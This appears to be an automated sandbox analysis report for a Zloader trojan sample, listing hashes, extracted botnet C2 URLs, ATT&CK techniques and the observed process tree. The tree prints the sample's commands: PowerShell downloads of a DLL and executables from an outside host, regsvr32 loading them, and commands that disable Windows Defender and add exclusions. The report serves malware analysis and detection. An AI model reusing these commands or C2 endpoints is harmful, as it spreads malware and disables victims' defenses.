zloader | 892ec03552cca2c62495e661fda9bfd113009f2d9b0a07c2b13d9f047953cb2f

Analysis

max time kernel
50s
max time network
168s
platform
windows7_x64
resource
win7v20210408
submitted
09-08-2021 06:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3740851312af7f75741d950015901cb7.exe
Size

165KB
MD5

3740851312af7f75741d950015901cb7
SHA1

f80ae1f66de60f5c42cfbc555be1dfb291cd6d5a
SHA256

892ec03552cca2c62495e661fda9bfd113009f2d9b0a07c2b13d9f047953cb2f
SHA512

e3c2a268e86521510e97b719e94ea64cfd4b716bcbd2eed7d896598d694a8cb5445e53f70fc0fcf4863c550bb0b3381b610a10477254febc1d45ef90607eefce

Score

10^/10

zloader vasja vasja botnet persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1772 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

1752 regsvr32.exe

flow	pid	process
6	1772	powershell.exe

pid	process
1752	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

3740851312af7f75741d950015901cb7.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	3740851312af7f75741d950015901cb7.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	3740851312af7f75741d950015901cb7.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

regsvr32.exe

pid process

1652 regsvr32.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1772 powershell.exe
1772 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1772 powershell.exe

pid	process
1652	regsvr32.exe

pid	process
1772	powershell.exe
1772	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1772	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

3740851312af7f75741d950015901cb7.execmd.exeregsvr32.exe

description	pid	process	target process
PID 1100 wrote to memory of 1776	1100	3740851312af7f75741d950015901cb7.exe	cmd.exe
PID 1100 wrote to memory of 1776	1100	3740851312af7f75741d950015901cb7.exe	cmd.exe
PID 1100 wrote to memory of 1776	1100	3740851312af7f75741d950015901cb7.exe	cmd.exe
PID 1776 wrote to memory of 1772	1776	cmd.exe	powershell.exe
PID 1776 wrote to memory of 1772	1776	cmd.exe	powershell.exe
PID 1776 wrote to memory of 1772	1776	cmd.exe	powershell.exe
PID 1776 wrote to memory of 1652	1776	cmd.exe	regsvr32.exe
PID 1776 wrote to memory of 1652	1776	cmd.exe	regsvr32.exe
PID 1776 wrote to memory of 1652	1776	cmd.exe	regsvr32.exe
PID 1776 wrote to memory of 1652	1776	cmd.exe	regsvr32.exe
PID 1776 wrote to memory of 1652	1776	cmd.exe	regsvr32.exe
PID 1652 wrote to memory of 1752	1652	regsvr32.exe	regsvr32.exe
PID 1652 wrote to memory of 1752	1652	regsvr32.exe	regsvr32.exe
PID 1652 wrote to memory of 1752	1652	regsvr32.exe	regsvr32.exe
PID 1652 wrote to memory of 1752	1652	regsvr32.exe	regsvr32.exe
PID 1652 wrote to memory of 1752	1652	regsvr32.exe	regsvr32.exe
PID 1652 wrote to memory of 1752	1652	regsvr32.exe	regsvr32.exe
PID 1652 wrote to memory of 1752	1652	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\3740851312af7f75741d950015901cb7.exe
"C:\Users\Admin\AppData\Local\Temp\3740851312af7f75741d950015901cb7.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\system32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/JavaE.dll -OutFile JavaE.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\system32\regsvr32.exe
regsvr32 JavaE.dll
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\SysWOW64\regsvr32.exe
JavaE.dll
4⤵
- Loads dropped DLL
PID:1752

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:2000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:1188

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:1300

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:1576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/javase.exe -OutFile javase.exe
4⤵
PID:1260

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:1516

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:1364

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
322f76e1c17af082e72a7d45b1a2d91a

SHA1
4baa7c21d1edd682bc91443a2574add583ef8225

SHA256
3018319cab5a5a111473d5f1c77ad1782b61684ef7d7cf68ca5124f43d55eef0

SHA512
266385291e92f17675837d1dc47861b3810911482b292ca2e67d29e6485f2defc6a017f351c965702ae55a5b64b5eaea6b5dcf00cebb44751587ecd9b333beae

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
80fb5a808f313c580a5ca87a368cfd9a

SHA1
ee8de66c9ad52965a99e0694523281a5f2b3b7ae

SHA256
bd1dda480fc500c13ec266ea4116d45dd658a314e1eff5bb052f0ee43a78300e

SHA512
a3e26e8a23eb0c6b9f990758543b60a2328db0c8261538a2bfc4722ecf70efa6d44088925e30bf6ecf8e3a1beeebbc7ccb8f2a1de6ddee2164674bad553970d7

Download Submit
C:\Users\Admin\AppData\Roaming\JavaE.dll
MD5
c43c3c195e838ef81a36c1434fa7395c

SHA1
c9accdc1204579d13440df22e4892fcc2082dc7c

SHA256
24c57cf9a9fd72827ced5f95796cf333089f076c660bf06b5e7d071a4d5fc102

SHA512
5ec2613176ddf8ca9ae331823cb7b62d436ea007850e60a9aeeee0bf23c827a2e3c1eb422594bdd3ec4c86f7688d91f3e8a3c6b2435c46078069c53947a1739f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
ae6f88d04438fbfcfae23609ea99ea63

SHA1
580e5249007fffa349f9a50cba640c0caa2a634c

SHA256
dedb5147f5983d40223c7bbcf2dc5b8d5ab2750f845c8b9e3ee4433f26c33e05

SHA512
b7808c9f694601d77d367920969f3686038ca8cf5a6f6b6d669809a9a2771f4e7753a9fae6a14a09b7b2631d81ab61abd629f2486141492f0465c443b9fd2c12

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
ae6f88d04438fbfcfae23609ea99ea63

SHA1
580e5249007fffa349f9a50cba640c0caa2a634c

SHA256
dedb5147f5983d40223c7bbcf2dc5b8d5ab2750f845c8b9e3ee4433f26c33e05

SHA512
b7808c9f694601d77d367920969f3686038ca8cf5a6f6b6d669809a9a2771f4e7753a9fae6a14a09b7b2631d81ab61abd629f2486141492f0465c443b9fd2c12

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
322897b43bc5f01c6dd2364fc94faacb

SHA1
cc8d099882d6913086d75ceb3672da7c9644fca4

SHA256
8baa6ab7cf72ad4eea577cbd687129e1c1eaacda6f98511a068f622f686fad95

SHA512
483bbad6afcc7a0b029692998e759d43fd7373cc7474a7e547d0019d20b536a2fc7c6d5116dc81cd8d89596cffefec3a4ecd42abc0ec019ad225c7da6af9d088

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
fd279e5a6bb1510406eee2a4c312e44e

SHA1
adb538eedadebff7c294b27951e293e24084b151

SHA256
e72131936fa9377ca3df27e876cc1f0624800e608bbe662cabf388dff7bc89db

SHA512
1d2e91e573e3a795c4572f9233b6fcaa4e51de500fc50a16693161e17194e46e1ef0e73280abc18a1dd348a4c44049e1361b17bd7f3786a5204fd08f686367ae

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\JavaE.dll
MD5
c43c3c195e838ef81a36c1434fa7395c

SHA1
c9accdc1204579d13440df22e4892fcc2082dc7c

SHA256
24c57cf9a9fd72827ced5f95796cf333089f076c660bf06b5e7d071a4d5fc102

SHA512
5ec2613176ddf8ca9ae331823cb7b62d436ea007850e60a9aeeee0bf23c827a2e3c1eb422594bdd3ec4c86f7688d91f3e8a3c6b2435c46078069c53947a1739f

Download Submit
\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
memory/1100-59-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

Filesize
8KB

Download
memory/1188-90-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

Filesize
4KB

Download
memory/1188-92-0x000000001C460000-0x000000001C461000-memory.dmp

Filesize
4KB

Download
memory/1188-88-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/1188-89-0x000000001AC04000-0x000000001AC06000-memory.dmp

Filesize
8KB

Download
memory/1188-87-0x000000001AC00000-0x000000001AC02000-memory.dmp

Filesize
8KB

Download
memory/1188-80-0x0000000000000000-mapping.dmp

Download
memory/1188-85-0x000000001AC80000-0x000000001AC81000-memory.dmp

Filesize
4KB

Download
memory/1188-84-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/1260-104-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/1260-102-0x000000001ACE0000-0x000000001ACE2000-memory.dmp

Filesize
8KB

Download
memory/1260-106-0x000000001ABF0000-0x000000001ABF1000-memory.dmp

Filesize
4KB

Download
memory/1260-105-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/1260-103-0x000000001ACE4000-0x000000001ACE6000-memory.dmp

Filesize
8KB

Download
memory/1260-101-0x000000001AE60000-0x000000001AE61000-memory.dmp

Filesize
4KB

Download
memory/1260-100-0x00000000022D0000-0x00000000022D1000-memory.dmp

Filesize
4KB

Download
memory/1260-96-0x0000000000000000-mapping.dmp

Download
memory/1300-93-0x0000000000000000-mapping.dmp

Download
memory/1364-124-0x0000000002430000-0x0000000002431000-memory.dmp

Filesize
4KB

Download
memory/1364-122-0x000000001AB24000-0x000000001AB26000-memory.dmp

Filesize
8KB

Download
memory/1364-121-0x000000001AB20000-0x000000001AB22000-memory.dmp

Filesize
8KB

Download
memory/1364-127-0x0000000002830000-0x0000000002831000-memory.dmp

Filesize
4KB

Download
memory/1364-115-0x0000000000000000-mapping.dmp

Download
memory/1516-108-0x0000000000000000-mapping.dmp

Download
memory/1576-95-0x0000000000000000-mapping.dmp

Download
memory/1652-71-0x0000000000000000-mapping.dmp

Download
memory/1752-75-0x0000000075B31000-0x0000000075B33000-memory.dmp

Filesize
8KB

Download
memory/1752-77-0x0000000000180000-0x0000000000200000-memory.dmp

Filesize
512KB

Download
memory/1752-78-0x0000000010000000-0x0000000010155000-memory.dmp

Filesize
1.3MB

Download
memory/1752-74-0x0000000000000000-mapping.dmp

Download
memory/1772-67-0x000000001ABD4000-0x000000001ABD6000-memory.dmp

Filesize
8KB

Download
memory/1772-66-0x000000001ABD0000-0x000000001ABD2000-memory.dmp

Filesize
8KB

Download
memory/1772-65-0x000000001AC50000-0x000000001AC51000-memory.dmp

Filesize
4KB

Download
memory/1772-64-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/1772-62-0x0000000000000000-mapping.dmp

Download
memory/1772-68-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/1772-69-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/1772-70-0x000000001B6C0000-0x000000001B6C1000-memory.dmp

Filesize
4KB

Download
memory/1776-60-0x0000000000000000-mapping.dmp

Download
memory/2000-86-0x0000000000090000-0x00000000000B6000-memory.dmp

Filesize
152KB

Download
memory/2000-79-0x0000000000000000-mapping.dmp

Download
memory/2036-112-0x0000000000000000-mapping.dmp

Download